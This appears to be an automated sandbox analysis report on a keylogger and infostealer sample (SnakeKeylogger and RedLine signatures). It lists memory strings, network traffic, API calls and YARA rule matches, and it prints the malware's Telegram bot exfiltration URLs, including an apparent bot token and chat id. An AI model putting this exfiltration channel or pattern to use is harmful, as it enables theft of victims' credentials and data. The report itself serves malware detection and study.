               Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
               Source: svchost.exe, 00000003.00000002.4473198929.0000000005275000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.00000000052F0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000056F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
               Source: svchost.exe, 00000006.00000002.4473666032.00000000056F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
               Source: svchost.exe, 00000003.00000002.4473198929.0000000005275000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
               Source: svchost.exe, 00000003.00000002.4473198929.0000000005275000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20a
               Source: svchost.exe, 00000006.00000002.4473666032.00000000056F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendDocument?chat_id=6443
               Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
               Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
               Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
               Source: svchost.exe, 00000006.00000002.4473666032.0000000005718000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
               Source: svchost.exe, 00000006.00000002.4473666032.0000000005713000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
               Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
               Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
               Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: svchost.exe, 00000003.00000002.4473198929.000000000524E000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005275000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.00000000051DE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005670000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: svchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.00000000051DE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: svchost.exe, 00000006.00000002.4473666032.000000000565C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
              Source: svchost.exe, 00000003.00000002.4473198929.000000000524E000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005275000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005208000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005670000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005617000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.000000000565C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
              Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: svchost.exe, 00000006.00000002.4473666032.0000000005749000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.000000000573A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
              Source: svchost.exe, 00000003.00000002.4473198929.0000000005337000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
              Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49721 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49749 version: TLS 1.2
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00C6EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00C6EAFF
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00C6ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00C6ED6A
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Code function: 2_2_00EDED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00EDED6A
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00C5AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00C5AA57
              Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00C89576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00C89576
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Code function: 2_2_00EF9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00EF9576

              System Summary

              Source: 3.3.svchost.exe.305af20.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.3.svchost.exe.305af20.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.3.svchost.exe.305af20.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 6.3.svchost.exe.346f000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 6.3.svchost.exe.346f000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 6.3.svchost.exe.346f000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.2.chordates.exe.3a90000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 3.2.svchost.exe.7730000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.svchost.exe.7730000.2.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.svchost.exe.7730000.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 6.2.svchost.exe.7b40000.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 6.2.svchost.exe.7b40000.3.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 6.2.svchost.exe.7b40000.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 3.2.svchost.exe.7730f20.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.svchost.exe.7730f20.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.svchost.exe.7730f20.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 6.2.svchost.exe.7f00000.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 6.2.svchost.exe.7f00000.4.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 6.2.svchost.exe.7f00000.4.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 3.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 6.2.svchost.exe.7b40000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 6.2.svchost.exe.7b40000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 6.2.svchost.exe.7b40000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 6.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 6.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 6.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 3.3.svchost.exe.305af20.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.3.svchost.exe.305af20.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.3.svchost.exe.305af20.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 6.2.svchost.exe.7b40f20.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 6.2.svchost.exe.7b40f20.2.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 6.2.svchost.exe.7b40f20.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 6.3.svchost.exe.346f000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 6.3.svchost.exe.346f000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 6.3.svchost.exe.346f000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 5.2.chordates.exe.13e0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 6.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 6.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 6.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 3.2.svchost.exe.7730f20.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.svchost.exe.7730f20.3.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.svchost.exe.7730f20.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 3.3.svchost.exe.305a000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.3.svchost.exe.305a000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.3.svchost.exe.305a000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 6.2.svchost.exe.7b40f20.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 6.2.svchost.exe.7b40f20.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 6.2.svchost.exe.7b40f20.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 3.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 6.2.svchost.exe.7f00000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 6.2.svchost.exe.7f00000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 6.2.svchost.exe.7f00000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 3.2.svchost.exe.7730000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.2.svchost.exe.7730000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.2.svchost.exe.7730000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 6.3.svchost.exe.346ff20.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 6.3.svchost.exe.346ff20.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 6.3.svchost.exe.346ff20.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 3.3.svchost.exe.305a000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 3.3.svchost.exe.305a000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 3.3.svchost.exe.305a000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 6.3.svchost.exe.346ff20.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 6.3.svchost.exe.346ff20.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 6.3.svchost.exe.346ff20.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000006.00000002.4470352706.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000002.00000002.2040744990.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000003.00000002.4470368288.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000005.00000002.2183245336.00000000013E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
